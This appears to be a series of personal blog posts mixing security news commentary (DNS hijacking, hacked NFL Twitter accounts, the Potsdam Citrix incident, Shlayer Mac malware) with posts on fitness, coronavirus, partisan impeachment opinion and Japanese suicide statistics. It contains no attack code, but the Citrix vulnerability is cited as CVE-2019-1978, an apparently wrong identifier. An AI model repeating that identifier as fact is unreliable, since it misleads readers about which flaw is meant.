Adversaries with Turkish Nexus Responsible for Cyber Attacks Targeting Europe and the Middle East

A series of cyber attacks beginning in early 2018 and continuing through 2019 are believed to have been carried out by threat adversaries with a nexus to the Turkish government. Approximately thirty organizations across Europe and the Middle East were affected by the operations, ranging from government ministries and agencies, private industry, and other groups:

According to two British officials and one U.S. official, the activity bears the hallmarks of a state-backed cyber espionage operation conducted to advance Turkish interests.

The officials said that conclusion was based on three elements: the identities and locations of the victims, which included governments of countries that are geopolitically significant to Turkey; similarities to previous attacks that they say used infrastructure registered from Turkey; and information contained in confidential intelligence assessments that they declined to detail.

The officials said it wasn’t clear which specific individuals or organizations were responsible but that they believed the waves of attacks were linked because they all used the same servers or other infrastructure.

What techniques did these purported nation state threat actors leverage?

The hackers used a technique known as DNS hijacking, according to the Western officials and private cybersecurity experts. This involves tampering with the effective address book of the internet, called the Domain Name System (DNS), which enables computers to match website addresses with the correct server.

By reconfiguring parts of this system, hackers were able to redirect visitors to imposter websites, such as a fake email service, and capture passwords and other text entered there.

Essentially, the initial goal of the threat activity was credential harvesting. If you are unfamiliar with the term, it is the act of tricking unsuspecting users to input their login credentials into a fraudulent web site or application. It usually starts off with a phishing email directing users to visit a web site which appears to be one the victim legitimately uses, asking them to login, and then storing the credentials for use in a later operation.

Once the attackers had amassed enough credential data, knowing average users often use the same password across multiple logins, the adversaries could then attempt to breach personal accounts - such as Twitter, Facebook, Gmail, and more - as well as their official government or business accounts. The latter being the crown jewels, although the personal accounts may also lead to additional opportunistic, targeted attacks.

What I find most alarming is certain DNS top-level domain providers were breached. The actual DNS servers themselves do not appear to have been affected but a number of organizations controlling them were compromised. Those organizations should know better, and have implemented better security controls, and security awareness.

This demonstrates how anyone can be the victim of a cyber attack.

Hackers Breach Multiple NFL Team Twitter Accounts, Including the 49ers and Chiefs

Pestering hackers are at it again, this time compromising a number of Twitter accounts belonging to National Football League teams, to include the two Super Bowl contenders:

Hackers compromised Twitter accounts belonging to the National Football League and some of its most popular teams, including Super Bowl contenders the San Francisco 49ers and Kansas City Chiefs, in an apparent series of cyberattacks Monday.

The hackers taunted the NFL and the teams in messages saying they were “here to show people that everything is hackable,” and promoted the hackers’ security services via email and Twitter hashtags.

Accounts for the Chicago Bears, Green Bay Packers and Cleveland Browns, among others, were also taken over.

It is not like hacking Twitter accounts is all that difficult. Let us assume the malicious actors attempted to breach more than just Twitter, such as the teams corporate networks, and other online presence. Why have they only thus far been successful with Twitter?

This is largely due to many users not configuring Twitter for two-factor authentication with an authenticator app, such as 1Password, Google Authenticator, or Authy. Had these teams been using TFA there is a much greater chance this attack would not have been successful. I specifically called out the use of an authenticator app rather than SMS because the latter is vulnerable.

It will be interesting to see why only these five teams were selected out of the total thirty-two teams in the NFL today. I doubt it has anything to do with specific motivation to attack these teams, but more so because of lax security on those Twitter accounts.

Security Attacks Cost Singapore Businesses $1.25M per Breach

Channel Asia is reporting on a study recently released by McAfee, claiming the average cost of a cyber attack to a Singapore-based business is approximately $1.25m per breach:

According to McAfee findings, the city-state houses the highest estimated costs stemming from a breach across Asia Pacific, ahead of markets such as Australia, Hong Kong, India, Indonesia, Malaysia, New Zealand and Thailand.

Findings from a survey of 480 cyber security decision-makers at a regional level paint a damning picture for Singapore with 80 per cent of respondents claiming that cyber security incidents pose “high” or “medium” impacts on business.

And:

Estimated costs from respondents in Singapore were more than double that of the next highest country in Asia Pacific, identified as Indonesia with financial implications at roughly S$785,000 per breach.

I would like to know how McAfee, and the various companies they interviewed, arrived at these numbers. Internal incident response is a bit of an art to accurately quantify. Leveraging external resources to assist with breach remediation is much easier to understand.

The likelihood of all of these Singapore-based companies only using outside assistance is small. There is a stronger chance of a more hybrid approach, where internal responders work in conjunction with external help of some sort.

In either case, I am curious to see how these numbers were derived.

German City Potsdam Offline After Cyber Attack

Potsdam, the capital of the German state of Brandenburg, has had to disconnect from the internet due to a cyber attack. Although specifics about how the attack was executed are light, the city claims the attack occurred because of a vulnerable third-party provider:

"The background to this is a weak point in the system of an external provider, which attempts to retrieve data from the state capital from outside without authorization or to install malware," an official statement says.

"In order to analyze the damage and to ensure the security of the data, external IT security companies and IT forensic experts are commissioned to support the IT specialists in the administration with their work."

This is far too sparse on details, and almost sounds word-smithed enough to purposely obfuscate any potential blame. A German journalist believes the attackers may have exploited vulnerable public facing Citrix servers:

While the City of Potsdam's updates on the cyberattack do not go into detail on what was the method the attackers used to infiltrate the network, German journalist Hanno Böck found Citrix ADC servers on the administration's network vulnerable to attacks exploiting the CVE-2019-1978 vulnerability.

Böck says that the servers he found weren't protected using mitigation measures provided by Citrix over a month ago.

It true, this is not at all related to a "weak point in the system of an external provider" but instead a failure of the city IT department to mitigate CVE-2019-1978. Failure to act in cyber space will almost always lead to a compromise.

Never Rely on a Single, Free Security Tool for Analysis

VirusTotal is a valuable resource for checking the verdict on file samples and URL's. Although the service offers a variety of benefits, it should never be the sole trusted resource for conducting analysis, especially in the context of a live incident response operation:

For example, a Defender gets forwarded a phishing email with a link to investigate. The Defender creates the tracking ticket and starts the workflow in their “analysis checklist”. They just want to get through this investigation and close out the ticket. The Defender may not even think about looking at the other things surrounding the email as in whats the content, where did it come from, what are the email headers, and other indicators. The decision to continue or close the investigation has now become all about the outcome of the scan of over 70 AV scanners on VirusTotal. The results (most likely) return that all 70 plus AV scanners claim the link is clean (not one flag). Defender quickly marks all is clear and closes the ticket. In many cases, this might be a quick solution and is not a bad starting point but can provide many false negatives.

Any cyber security analyst worth their salt knows to cross-reference across multiple tools. VirusTotal is merely one of many useful tools for determining authenticity of files and URL's, but is not a one-stop shop to be unequivocally trusted. Any incident response playbook leveraging free applications like VT should contain multiple tools, whether on-site or cloud-based, for analysis.

The same can be said for Hybrid-Analysis. It is a wonderful tool, most often extremely capable of determining whether or not a sample is malicious. It is not infallible, and therefore because it is a free service should be used in conjunction with other free services. Based on an aggregate score across multiple tools, and the context around the threat, defenders and analysts can take appropriate actions.

Construction Company Ransomware Attack Raises Questions About Federal Contracts

A recent ransomware attack against a Canadian construction company is raising questions about the level of cyber security controls required, or apparent lack thereof, for industry to win federal contracts.

While it doesn't appear that any secure government files were compromised in the hack, the Bird case raises concerns about how secure government contracts are as the number of ransomware incidents multiplies.

Between 2006 and 2015, Bird scored 48 contracts with the Department of National Defence totalling more than $406 million. Bird also helped build the RCMP's Surrey detachment headquarters and has done work for Public Services and Procurement Canada.

Christyn Cianfarani, president of the Canadian Association of Defence and Security Industries, said Canada could learn from the United States and Britain, countries that have taken steps to ensure the security systems of all government contractors are locked down — even those not dealing with classified information.

Luckily no sensitive files were compromised in the attack. However, one has to wonder how a government contractor has allowed this to occur. Are there no minimum security requirements for Canadian government contractors? Maybe the bar is set so low that a simple ransomware attack is capable of being executed?

While no company can 100% ensure they are safe from attack, there is no reason why a standard ransomware attack should be successful. There are a myriad of endpoint security controls - from next-generation antivirus to endpoint detection & response - capable of either preventing or providing visibility on attacks like ransomware.

Buried within the article is this note:

"When we look at the major hacks that have occurred, especially on the defence side, where you know fighter aircraft information was stolen — it wasn't stolen from the prime contractor, it was stolen in a tiny, tiny shop supplying widgets," she said, citing the 2017 theft of sensitive information about Australia's defence programs through a government contractor.

Whether they're done by nation states or by criminal organizations or by rogue actors, it's a characteristic of these kinds of attacks to get to governments using businesses as the point of entry, especially ... small businesses that tend to be the most vulnerable."

Threat adversaries are not stupid; they do the reconnaissance required to find vulnerable targets. Those tiny shops supplying widgets are, more often than not, the weakest links in the supply chain.

Mozilla Bans Nearly 200 Malicious Firefox Add-Ons

Notwithstanding a few hiccups here and there, Mozilla takes privacy quite seriously. Over the years they have done a lot of valuable work to ensure the web is a safe place to browse. In their latest move, Mozilla has taken a look at the Firefox add-on database and removed nearly two-hundred extensions for including malicious code:

Over the past two weeks, Mozilla's add-on review team has banned 197 Firefox add-ons that were caught executing malicious code, stealing user data, or using obfuscation to hide their source code.

The add-ons have been banned and removed from the Mozilla Add-on (AMO) portal to prevent new installs, but they've also been disabled in the browsers of the users who already installed them.

The bulk of the ban was levied on 129 add-ons developed by 2Ring, a provider of B2B software. The ban was enforced because the add-ons were downloading and executing code from a remote server.

Why is this single, relatively unknown company developing that many add-ons? It sure feels like a huge red flag. Surely there is some deception at play.

Laughably Unsophisticated Mac Malware

Major malware infections on macOS are quite rare but the operating system is, by no means, immune to what Windows users have had to endure for decades. Over the last two years macOS users have been pestered by Shlayer and all the pirated videos it promises to provide the unsuspecting victim:

An analysis Kaspersky Lab published on Thursday says that Shlayer is “a rather ordinary piece of malware” that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remote traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday’s post said “is basically the calling card of the entire family.”

Another banal detail about Shlayer is its previously mentioned infected method. It’s seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.

Unless you have good self control, good web browsing hygiene, and common sense, stay away from web sites offering pirated content. Is that one free pirated movie worth all the work to rebuild your computer after it gets infected with some malware it should never have in the first place?

Exaggerating Impact of Cyber Attacks Does Nobody any Good

Adam Rowe of tech.co writes one of the worst clickbait heading I have seen recently, stating cyber incidents are deemed a bigger global business risk than climate change. Fortunately the article states a much different claim:

Cybersecurity risks are the highest priority for businesses around the globe in 2020, according to an extensive new survey. By comparison, climate change clocked in at seventh as the biggest perceived business risk worldwide.

Granted, that's still climate change's highest ever ranking, and a sign that it's moving up in importance as the effects of humanity's impact on Earth's climate become increasingly extreme.

The Allianz Risk Barometer 2020 conducted research through a survey of over 2,700 experts across 100 countries. These experts were stipulating impact to specific businesses as opposed to the overall global risk as the clickbait headline suggests.

Overall it is not a bad article, but headline hyperbole is strong with this one.

Japan Fearing Wuhan Coronavirus Outbreak with Olympics on the Horizon

The Tokyo 2020 Olympics are right around the corner and the Wuhan Coronavirus has the entire nation concerned. There are expected to be millions of visitors across Japan to support the Olympics, and Japan is worried a coronavirus outbreak may have a devastating impact on the nation:

Although Japan has seen just one case, the outbreak highlights the risk of contagion given the millions of visitors expected for the Summer Games.

“We have to be very careful about what kind of infectious diseases will appear at the Tokyo Olympics,” Kazuhiro Tateda, president of the Japanese Association for Infectious Diseases, told a briefing on Wednesday.

“At these kinds of mass gatherings, the risks increase that infectious diseases and resistant bacteria can be carried in.”

Being a Tokyo resident, and someone who frequently travels abroad, this virus is extremely concerning. On the one hand, I do not want to unknowingly catch something while abroad on business. On the other, I do not want the influx of tourists to have any major, lasting health effects on Japan.

Hitting the Gym in January is Total Hell on the Legs

I recently got back in to the gym and it has been a struggle. The first week was not fun, with every muscle in my body aching after finishing working out. As Wired points out, which I absolutely can confirm, hitting the gym in January is literal hell on the legs:

But actually that soreness might be the sign of a workout well done. What you’re likely experiencing when your muscles ache the day after a tough gym session is something called DOMS: delayed onset muscle soreness.

When you put your muscles to work, tiny tears appear in the muscle fibres, and it's repairing these tears that leads to inflammation and soreness. DOMS happens after your muscles lengthen under tension, something called eccentric muscle contraction. For example when you’re lowering down a weight and your arm extends slowly, and the muscle tears slightly. It’s also common after downhill running, rock climbing and resistance based exercises.

“We call it the good pain because it shows that your training session was actually quite effective,” says Aamer Sandoo, lecturer in sport and exercise science at Bangor University in Wales. When the muscle repairs those tears, it makes it stronger. With exercise, we're trying to cause trauma to the muscle and the body's response is to make a stronger muscle by depositing more fibres within it.

The good kind of pain. I sure hope whatever I am currently attempting to do in the gym will have a positive effect. To stay motivated I need to see some fairly rapid indication the hard work I am investing in the gym is actually paying dividends towards my ultimate goal of de-beer-belly-ifying!

"Why Are They Doing This to Me??" Trump Asks Friends

President Donald J Trump, the third president to be officially impeached, seemingly cannot wrap his head around any of this:

Meanwhile, with his lawyers going about their business defending the president, Trump, who was at Mar-a-Lago on Friday, appeared “distracted” by the impeachment process. According to CNN, the president was asking people at the resort, “Why are they doing this to me?” adding, that he “can’t understand why” he is impeached.

Someone who cannot figure out why they are being impeached, after having had his administration undertake sketchy operation after sketchy operation, while completely blocking the administration from speaking to Congress to substantiate his "perfect call" with the Ukraine, is obviously unqualified to be in a position of such import. Simply put, President Trump should not be the leader of the free world.

The best leaders are capable of self-reflection and understanding where their decisions went awry. They make adjustments moving forward. Some work, some do not. However, the fact that Trump cannot understand he did anything wrong speaks to his entire life of entitlement, never having learned lessons and being punished for wrong doing. So this whole concept of pivoting based on lessons learned is as completely foreign to him as is running a successful business.

Senate Republicans are Bathed in Shame

The impeachment of President Donald Trump is officially underway, with the Senate having affirmed their oath to administer impartial justice. However, as most of the global witnesses have observed, over half of the current US Senate has basically buried their heads in the sand, essentially rendering a shameless verdict before the trial begins.

How in God’s name — and it was in God’s name — can the Republicans who have already decided to acquit President Trump take a solemn oath to administer “impartial justice”? They’re partial to the core, unabashedly so, as their united march toward a foregone conclusion shows. A mind-meld this ironclad isn’t a reflection of facts. It’s a triumph of factionalism.

The majority of the party’s senators have said outright or clearly signaled that they have no intention of finding the president guilty and removing him from office. Yapping lap dogs like Lindsey Graham and obedient manservants like Mitch McConnell have gone further, mocking the whole impeachment process.

So the oath they took: How does that work? Did they cross the fingers on their left hands? Do they reason that American politics has reached a nadir of such fundamental hypocrisy and overweening partisanship that no one regards that pledge as anything but window dressing?

If the tables were reversed you can rest assured the Republicans would be crying day and night on state-sponsored TV, and be doing everything in their power to ensure the Democratic president was removed from office.

Suicides in Japan Fall Below 20,000 to Record Low in 2019

Although Japan is stereotypically known as the suicide country, the latest statistics are painting a different picture. The number of officially recorded suicides in Japan has decreased to below 20,000 for the first time since 1978:

There is still a possibility that final tallies, which will be published in March, will show a slight increase to above 20,000, the ministry said. But even so, it’s possible that the 2019 figure will represent an all-time low, breaking the mark set in 1981 of 20,434, according to ministry official Yoshindo Nonaka.

The ministry’s figures show that 2019 marked a 10th consecutive year-on-year decrease in the number of suicides, down 881 people — or 4.2 percent — from a year earlier

The number of suicides recorded in Japan stood at 19,959 last year, falling below the 20,000 mark for the first time since authorities began keeping such records in 1978, according to preliminary figures released Friday by the health ministry.

Although the exact reason is not yet known, I think everyone can agree the downward trend is extremely positive.